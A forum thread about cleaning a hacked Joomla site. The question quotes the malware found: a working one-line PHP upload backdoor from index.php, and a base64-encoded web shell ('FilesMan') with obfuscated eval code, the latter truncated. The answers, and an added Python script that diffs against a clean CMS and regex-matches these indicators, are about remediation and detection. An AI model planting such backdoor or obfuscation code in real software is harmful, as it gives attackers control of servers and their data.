Malware
Anton, 2015-03-30 14:02:43

Site infection, what to do next?

A friend asked me to help clean up an infected site. I downloaded it, studied it, and what I saw in the end was 15 thousand files. OK, let's check them with an antivirus: several dozen files are infected. I started digging through them. This line in index.php puzzled me:

if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}

This means that a hacker can upload files remotely. I was also puzzled by a file called cron.php. What cron jobs could a business-card site possibly need? The antivirus did NOT flag cron.php as infected, but I decided to look into it. Now the most interesting part:
eval(base64_decode("Ly83MTg3O...MTg3O"));
That was the content of cron.php. I ran it and got:
$auth_pass = "63a9f0ea7bb98050796b649e85481845"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9Vc...uA='\x29\x29\x29\x3B",".");

When I ran it, I saw the following interface in the browser... with all the ins and outs of the server:
Through this interface, you can do anything with the server's file system.
The question arose: how to cure the site?
1. Hire a monkey to check all 15 thousand files and remove all the viruses (since the antivirus itself cannot extract the virus from the base64_decode); this is probably expensive.
2. Roll back to a backup, preferably one from six months ago (this option was suggested by the friend; I doubt it myself, but what if the site was infected six months ago, anything can happen).
3. .htaccess, locking FTP access, etc. (I suggested this option, because I have already done it myself, and it worked).
I had previously tried all 3 options myself when fiddling with my own infected sites. In the end, only the third option helped.
What do you recommend? Maybe there are other options? Or are there any additions to the options I suggested?

3 answer(s)
Anton, 2015-04-14
@fattan

To sum up:
The hosting was Spiceweb (sweb.ru). They keep backups for the last five days at most (!!!). Tech support is silent. A fairy tale!
The site was on Joomla 2.1 (or something like that).
I manually moved the content from the Joomla 2.1 database into Joomla! 3.4.1 (for the 10 pages of a business-card site this turned out to be faster than fiddling with their migrate system).
...And then I lost patience and rewrote the site from scratch on modx evolution (one of my favorites).
Naturally, I changed hosting providers.
While working, out of curiosity I looked into the Joomla! 3.4.1 scripts and the scripts of the latest modx evolution (1.13, I think)
and .... was surprised! Joomla has long been using all the features of PHP 5.4: class autoloading with namespaces, the familiar fields in classes... plus two-factor authentication out of the box and much more. (I'll stay on modx evo because you can configure everything quickly and flexibly.)
But the developers of my favorite modx, it seems, are still running around with spears in mammoth skins. This is because the main focus is on the REVO branch (I think), so EVO is developing slowly.
CONCLUSIONS:
1. Do not use Spiceweb. Never ever.
2. Don't use Joomla. Old Joomla, that is.
3. Don't be afraid of the new Joomla.

SanyaZol, 2015-05-14
@SanyaZol

If there are no backups but the site has to be cleaned, the recipe is roughly this:
- Take a clean copy of the CMS of the same version and do a diff. All files will differ because of this injected code.
- Analyze the changes the virus made to all the files. Most likely they can be undone with a simple PHP script: fix them, and try to bring the files back to their original form.
- Then do a diff against the clean CMS again (in ignore-whitespace mode if the changes show a bunch of spaces due to imprecise cleaning) and decide what to do with the remaining "unsynchronized" files: clean them by hand, write a script, or whatever.
- Don't forget to check the database; a lot of interesting things could remain there too.
- When everything is cleaned, make a backup, update everything, and make a backup again.
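One way to script the diff step above, as an added example (Python, not code from any poster on this page): it hashes a site tree against a clean copy of the same CMS, lists modified and extra files, and flags those containing the indicators quoted in the question (eval of a base64 blob, the preg_replace /e trick, move_uploaded_file with a $_POST-controlled destination). The file names, contents and the temp-directory layout are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile
# Patterns taken from the snippets quoted in the question (constructed regexes).
SUSPICIOUS = [
    re.compile(r"eval\s*\(\s*base64_decode\s*\("),       # eval(base64_decode(...))
    re.compile(r"preg_replace\s*\(\s*[\"'].*?/e[\"']"),  # /e modifier executes code
    re.compile(r"move_uploaded_file\s*\(.*\$_POST"),     # attacker-chosen destination
]

def walk(root):
    # Map relative path -> sha256 for every file under root.
    result = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                result[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return result

def compare_trees(clean_root, site_root):
    """Return (modified, extra, flagged) relative paths of the site vs. the clean CMS."""
    clean, site = walk(clean_root), walk(site_root)
    modified = sorted(p for p in site if p in clean and site[p] != clean[p])
    extra = sorted(p for p in site if p not in clean)
    flagged = []
    for rel in modified + extra:
        with open(os.path.join(site_root, rel), errors="replace") as fh:
            text = fh.read()
        if any(rx.search(text) for rx in SUSPICIOUS):
            flagged.append(rel)
    return modified, extra, sorted(flagged)

def demo():
    """Build a constructed clean copy and an infected copy in a temp dir, then compare."""
    base = tempfile.mkdtemp()
    clean, site = os.path.join(base, "clean"), os.path.join(base, "site")
    originals = {"index.php": "<?php\nrequire 'app.php';\n", "app.php": "<?php\necho 'hi';\n"}
    for root in (clean, site):
        os.makedirs(root)
        for rel, body in originals.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
    # Infection as in the question: uploader appended to index.php, eval-blob cron.php (constructed).
    with open(os.path.join(site, "index.php"), "a") as fh:
        fh.write("if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);}\n")
    with open(os.path.join(site, "cron.php"), "w") as fh:
        fh.write('<?php eval(base64_decode("QUJD"));\n')
    return compare_trees(clean, site)
```

Point compare_trees at a real site and a freshly downloaded CMS of the same version; files that are modified but not flagged still need a manual look, since the indicator list only covers what this thread shows.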

Vladimir Martyanov, 2015-03-30
@vilgeforce

Backups should be incremental, with good history retention. Using them, you can easily track when the file has changed and in what way.
No automatic treatment will give a guarantee, keep that in mind.
